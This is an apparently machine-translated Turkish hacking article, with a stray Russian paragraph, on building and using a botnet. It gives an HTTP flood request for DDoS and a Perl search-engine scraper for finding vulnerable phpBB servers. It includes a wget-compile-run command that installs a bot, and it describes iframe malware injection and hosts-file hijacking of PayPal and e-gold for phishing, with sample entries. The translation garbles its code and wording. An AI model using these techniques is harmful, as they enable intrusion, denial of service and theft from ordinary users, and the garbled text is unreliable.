İnternet muazzam bir güçle büyüyor. Bir bilgisayar korsanının güvenlik açıklarını bulması giderek daha zor hale geliyor. Yöneticiler, geliştirmeyi korumak için en havalı güvenlik uzmanlarını kullanır. Düşüncelerini tanıyor musun? Aslında, İnternet güvenlik açıklarıyla doludur, bu nedenle onlardan çok az yararlanılır. Eh, hala öyle görünüyorsun İşte, durumu hayal et, bir ağ piçinin var, onu cezalandırmak istiyorsun. Bugün kendi savaş botnetinizi oluşturmaktan bahsedeceğiz.
Peki "bot" nedir? Deneyimsiz bir kişiye, bilgisayar oyunlarındaki aptal rakipler hemen iki dakika içinde vuracağınız belleğe koşar. Evet, bu kısmen doğrudur. Bizim durumumuzda, bir "bot", komutlarını yürüten bir programdır. Özel birşey yok. Birisi itiraz edecek: "Ben, derler ki, bunu beş yaşında yazdım, bir düğmeye basıyorsunuz ve program olya-la kapanıyor." Çocukluğu unutalım. Kodlamanın olanaklarının sonsuz olduğunu ve iyilik ve kötülük için kullanılabileceğini hepimiz biliyoruz. Elbette biz de geliştirmelerimizi hep iyi niyetle kullandığımız için. "Botnet", tek bir merkezde toplanan ve sahibinin komutlarını eşzamanlı olarak yürüten bir dizi bottur. Bu arada, botlar çoğunlukla daha fazla Windows makinesini hedefler. Burada şifreleri çalabilir, bir sox koyabilir ve vidayı biçimlendirebilirsiniz.Ben kurallardan sapıp nix makinelerinden nasıl botnet oluşturacağınızı anlatacağım. Botumuzun ana işlevi DDOS saldırılarını organize etmektir. Bu, nix sunucularının geniş kanallarını kullanmanın ideal bir yoludur. Sayalım. "Doldurmak" istediğiniz sunucu 100Mb kanalında. Yani aynı kanalda duran 10-20 bot bir anda sunucuyu bunaltacaktır. Bir sunucudan bir güvenlik duvarının arkasına saklanabiliyorsanız, ne yazık ki, daha fazla bottan kurtuluş yoktur.

[Bir bot yazmak]
Örnek bir bot listesine makalenin sonundaki bağlantıdan ulaşabilirsiniz. Bunu kodla biraz çözelim. (uh, Dream yine her şey IRC üzerinden mi kontrol ediliyor? WEB üzerinden daha havalı!). Bu arada, IRC üzerinden kontrol, etkileşimi ile seçilmiştir. Diyelim ki bir botnetteki birkaç sunucuda yerel nükleer istismarlar çalıştırmak istiyorum. Botu kullanarak SH uname -a komutunu çalıştıracağım ve anında ihtiyacım olan bilgisayarı bulacağım. Ardından, komutu IRC istemcisinde de çalıştırdıktan sonra, arka kapıyı yükleyeceğim ve sonraki eylemler için etkileşimli bir kabuk alacağım. İmkanlar sonsuzdur. Diyeceksiniz ki - böyle bir kontrolü WEB üzerinden uygulayabilirsiniz, ama neden sayfayı yeniden yükleyin ve trafiği boşa harcayın? Her şeyi gerçek zamanlı olarak gözlemlemek çok daha uygundur (her ne kadar 1000'den fazla botlu bir botnet ile, arayüzün rahatlığına dikkat edebilirsiniz - yaklaşık. Sağduyu). Birçok kişi DDOS'u organize etmenin çok zor olduğunu düşünüyor. İşte ortak bir saldırı kodu örneği:

GET /server.org HTTP / 1.0 \ r \ nBağlantı: Canlı Tut \ r \ nKullanıcı Aracısı: Mozilla / 4.75 (X11; U; Windows 5.2 i686) \ r \ nHost: server.org:80\r\nKabul et: resim / gif, resim / x-xbitmap, resim / jpeg, resim / pjpeg, resim / png, * / * \ r \ nKabul Et-Kodlama: gzip \ r \ nKabul Et-Dil: en \ r \ nKabul Et-Karakter: iso- 8859-1, *, utf-8 \ r \ n \ r \ n

Yani, sunucuya yanıt vermeye zorlayan bir istek göndeririz. Ve sunucu, trafik veya işlemci süresi eksikliğinden düşene kadar göndeririz. Ancak bazı nix botlarıyla sınırlı mısınız, sonuçta, örneğin AgoBot'a dayalı bir Windows botnet oluşturmanız gerekiyor. Bunu yapmak için, botun kurulu olduğu sunucuya bağlanan makinelerde lsasl/dcom güvenlik açıklarını tarayacak olan bot için bazı kodlar oluşturabilirsiniz.

[Bir botnet oluşturun]
Botnet oluşturmak aslında çok kolay. Bunu yapmak için herhangi bir web komut dosyasında bir güvenlik açığı bulmamız gerekiyor. Bulunan güvenlik açığı, yorumlayıcının kabuk komutlarının yürütülmesine izin vermelidir. Bir güvenlik açığı bulduğunuzda, arka uç dosyasının adına, başlığına ve güvenlik açığı bulunan sistemin adına dikkat edin. Şimdi bu verilerle iyi bir arama sorgusu yazmanız gerekiyor. Örneğin, phpBB'de iyi bilinen bir güvenlik açığını ele aldım.<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ sock = IO :: Socket :: INET-> new (PeerAddr => "search.aol.com", PeerPort => "80", P ro to => "tcp") veya sonraki; yazdır $ sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP / 1.0 \ n \ n"; @resu =<$sock>; kapat ($ çorap);

Wget http://server.org/bot.c;gcc bot.c -o bash; chmod + x bash; ./ bash;

Burada aynı anda iki sorun görülebilir. wget ve gcc görünmeyebilir veya kullanılması yasaklanabilir. Burada, rookers fech, curl and get veya lynx konsol tarayıcısı bize yardımcı olacak, yoksa ftp protokolünü kullanacak. Uygulaması daha karmaşıktır, ancak artısı, ftp'nin her yerde olmasıdır.Derleyiciye gelince, basitçe kabuğunuzdaki ikili dosyayı derleyebilir ve uyumlulukla her şeyin yoluna gireceğini umabilir veya botu yorumlanan dillere yeniden yazabilirsiniz - Perl veya PHP. Her yöntemin kendi avantajları ve dezavantajları vardır, hangisini kullanacağınız, seçim sizin. Yakalanan sunucudan en iyi şekilde yararlanmaya alışkınım. Sonuçta, bir nix sunucusundaki bir bot, yalnızca makinenin ilk yeniden başlatılmasına kadar sürer. Bu durumdan çıkmanın ilginç bir yolu var. Bot, yazmak için mevcut okunabilir dosyaları (.pl, .php) arayacak ve indirme ve başlatma kodunu bunlara ekleyecektir. Veya başka bir Windows botnet oluşturabilirsiniz. Bunun uygulanması da kolaydır. Burada, gerekli dosyanın indirilmesine ve başlatılmasına yol açan İnternet tarayıcısında (Internet Explorer, Opera, Mozilla) bir güvenlik açığına ihtiyacımız var. Ardından, kötü amaçlı kodumuzu indiren bir çerçeve girişi oluşturulur. Bu giriş, tüm dizin dosyalarına eklenir (veya html kodunun olduğu her yerde, hepsi sizin küstahlığınıza bağlıdır). Arşivlerde de bulacağınız küçük bir betik Haz, bu çalışmayla harika bir iş çıkarıyor. Hata izleme, Internet Explorer'daki kritik güvenlik açıklarının kayıtlarıyla doludur, bu nedenle bağlılığımız Windows sistemlerinde bir botnet'i de içerecektir (avantajlarından yukarıda bahsetmiştim). İşte bu, arama solucanımızı yüksek hızlı bir kabukta çalıştırın, kahve için (bira, votka, domates suyu), bot özelliklerinde belirtilen IRC kanalına gidin ve astlarınızın sayısını izleyin. Sonuç olarak, beni tanıyan herkese merhaba demek ve iyi şanslar dilemek istiyorum. Yakalanma.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

phpBB'deki güvenlik açığı 2.0.16 sürümüne kadar geçerlidir, ancak geliştiriciler bunu 2.0.11'de düzelttiklerini iddia etmektedirler.

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

E-dolandırıcılık
Botları phishing organizasyonu olarak kullanmak çok uygundur. Bunu yapmak için, ihtiyacımız olan siteyi taklit eden özel kimlik avı sayfalarına ve iyi bir barındırmaya, özel bir sunucuya veya VDS'ye ihtiyacımız var. Bu tür sayfalar kendiniz yapılabilir, satın alınabilir, internette bulunabilir. Seçim çok büyük. Çoğu zaman, kimlik avı şu sitelerde düzenlenir: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om ve diğerleri, bir şekilde elektronik ticaretle bağlantılı. Ardından, Windows botu \ system32 \ driver \ etc \ hosts dosyasını yeniden yazar ve ona sunucunuzun ip adresini ekler ve ihtiyacınız olan sitenin diğer adını ona atar. Dosya formatı aşağıdaki gibidir:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Yani kullanıcı tarayıcıya e-gold.com ve paypal.com sitelerini yazarak hiçbir şeyden şüphelenmeden sunucumuza ulaşmaktadır. Sırayla, kimlik avcısının sunucusunda, ilgili alan adlarıyla ilgili girişler httpd.conf'a eklenir.

DocumentRoot "/home/e-gold.com/www" SunucuAdı "www.e-gold.com" ServerAlias ​​​​"e-gold.com" "www.e-gold.com"

Elbette tarayıcı satırı tanıdık e-gold.com adresini içerecek ve ileri düzey bir kullanıcı bile hiçbir şeyden şüphelenmeden siteye giriş yapacaktır. Tamlık adına, kullanıcı bir proxy sunucusu kullanıyorsa, bu yöntemin çalışmayacağını söyleyeceğim.

Her zevke uygun botlar
Agobot / Phatbot / Forbot / XtremBot
Bu, en iyi bot ailesidir. C++ ile yazılmıştır. Algılamaya karşı birçok koruma fonksiyonuna sahiptirler ve açıkça tanımlanmış modüler yapıları sayesinde 500'den fazla modifikasyona sahiptirler.
SDBot / RBot / UrBot / UrXBot
DDOS saldırıları için şu anda çok popüler botlar. Birçok ek işlevi vardır. Sock4 keşif, keylogger, otomatik lsass ve dcom güvenlik açığı tarayıcısı gibi. Ayrıca \ system32 \ driver \ etc \ hostları düzenleyerek ve 80 numaralı bağlantı noktasına küçük bir sahte web sunucusu kurarak antivirüs şirketlerinin web sitelerine gelen istekleri yerel sunucuya yönlendirme işlevine de sahiptir.
DSNX Botları
Bu bot, DDOS saldırıları, port taramaları ve diğer bazı küçük şeyleri gerçekleştirebilir.
Q8 Botlar
Nix sistemleri için mükemmel bir bot. Kompakt kodu (27 Kb, bir dosyadan oluşur) ve iyi işlevselliği ile ayırt edilir. Yeni bir dosya indirip çalıştırarak dinamik olarak güncellenebilir. Temel DDOS uygulamalarını iyi uygular (SYN-flood, UDP-flood). Sistem komutlarının nasıl yürütüleceğini bilir. Ayrıca sistemde iyi gizlenir.
kaiten
Ayrıca Unix / Linux sistemleri için iyi bir bot. Yakalanan bir sunucuda uzak bir kabuğun nasıl açılacağını bilir.
Perl tabanlı botlar
Bunlar Perl'de yazılmış çok küçük botlardır. Unix tabanlı sistemlerde DDOS saldırıları için kullanılır.

---
Makalenin bilgisayar korsanlığına karşı büyük bir önyargısı var, bu yüzden net değil - sorun.

Uydurma © 2021 Mobil ve Bilgisayar Gadget'ları